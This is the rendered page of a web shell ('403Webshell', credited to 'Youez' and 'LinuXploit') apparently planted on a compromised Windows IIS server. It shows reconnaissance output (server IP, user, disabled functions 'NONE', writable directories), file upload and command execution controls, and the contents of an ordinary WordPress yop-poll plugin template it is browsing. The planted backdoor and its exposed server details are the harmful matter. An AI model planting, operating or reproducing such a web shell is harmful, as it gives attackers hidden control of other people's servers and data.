403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Old Sites/repository/wp-content/plugins/yop-poll/admin/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Old Sites/repository/wp-content/plugins/yop-poll/admin/views/migrate-old-tables.php
<?php
$ajax_nonce = wp_create_nonce( "yop-poll-ajax-importer" );
?>
<div id="yop-main-area" class="bootstrap-yop wrap migrate-section">
	<div class="row" style="margin-top: 10px;">
		<div class="col-md-2">
		</div>
		<div class="col-md-8">
			<h3 class="text-center">
				<?php _e( 'Here you can migrate data( votes, bans, logs ) from previous version', 'yop-poll' );?>
			</h3>
			<p>&nbsp;</p>
			<div class="row">
				<div class="col-md-2">
					<?php _e( 'Enable GDPR', 'yop-poll' );?>
				</div>
				<div class="col-md-10">
					<select class="migrate-enable-gdpr" style="width:100%">
						<option value="yes"><?php _e( 'Yes', 'yop-poll' );?></option>
						<option value="no" selected><?php _e( 'No', 'yop-poll' );?></option>
					</select>
				</div>
			</div>
			<div class="row migrate-gdpr-solution-section hide" style="margin-top: 10px;">
				<div class="col-md-2">
					<?php _e( 'Solution', 'yop-poll' );?>
				</div>
				<div class="col-md-10">
					<select class="migrate-gdpr-solution" style="width:100%">
			            <option value="consent"><?php _e( 'Migrate as is', 'yop-poll' );?></option>
			            <option value="anonymize"><?php _e( 'Anonymize Ip Addresses', 'yop-poll' );?></option>
						<option value="nostore"><?php _e( 'Do not migrate Ip Addresses', 'yop-poll' );?></option>
			        </select>
				</div>
			</div>
			<div class="row" style="margin-top: 10px;">
				<div class="col-md-12 text-center">
					<input type="hidden" id="_csrf_token" value="<?php echo $ajax_nonce; ?>" name="_csrf_token">
					<button class="button send-request">
							<?php _e( 'Start Migrating', 'yop-poll' );?>
					</button>
				</div>
			</div>
			<div class="row" style="margin-top: 10px;">
				<div class="col-md-12 text-center migrate-output">
				</div>
			</div>
		</div>
		<div class="col-md-2">
		</div>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit